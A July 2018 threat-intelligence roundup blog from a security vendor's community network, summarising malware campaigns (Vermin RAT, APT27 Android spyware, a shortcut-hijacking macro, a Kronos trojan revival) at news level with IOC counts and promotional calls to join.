Threat Exchange Network blog: July 2018

The Blueliv Threat Exchange Network is a global community of thousands of cybersecurity experts, IT professionals and academics. Each month members publish the latest news, threat data, IOCs and more in order to improve resilience and accelerate incident response. Members can create their own intelligence feeds for free by exporting these IOCs via our API and numerous SIEM plugins.

The fight against cybercrime is a collaborative effort. Here you’ll find some of the top posts from our Threat Exchange Network over the past month.

Join for free today – in addition to fresh intelligence, members also have access to our automated elastic sandbox and real-time cyberthreat map, including details on active crime servers.

A deep dive down the Vermin RAThole

An ongoing campaign used to systematically spy on Ukrainian government institutions and exfiltrate data has been detected and analyzed by researchers. They have detected three different strains of .NET malware: Quasar RAT, Sobaken RAT and a customer-made RAT called Vermin. [174 IOCs]

APT27 malware code uncovered

Analysts have been working through the content of an open repository containing some Android applications, including an Android spyware developed to exfiltrate sensitive information. The researchers discovered that it was part of APT27’s Arsenal, a Chinese group also known as Golden Rat Organization. It uses both Windows and Android malware to compromise target devices, and its activity is still ongoing.  [93 IOCs]

Malicious Macro hijacks desktop shortcuts to deliver backdoor

Malicious macros are still delivering malware, albeit in more creative ways that in the past. A recently identified sample searchers for specific shortcut files in a user’s system and replaces with one pointing to download malware. When clicked, it executes and recovers the original shortcut file to open the correct application. Researchers found that the malware ‘assembles’ its payloads, downloading common tools to gather information and send back via SMTP. [45 IOCs]

New version of Kronos banking trojan discovered

At least three new campaigns spreading a revamped version of Kronos have been identified. The malware’s heyday was back in 2014, yet researchers have seen users of German, Japanese and Polish banks being targeted this year. At the same time the variant started to appear, a new trojan was advertised on hacking forums called Osiris – possibly the new name of Kronos in 2018. [22 IOCs]

Our community is growing daily – become a member for free, earn recognition for your contributions to the Network.

Read our free cyber security and cyber threat reports

Read now
Demo Free Trial MSSP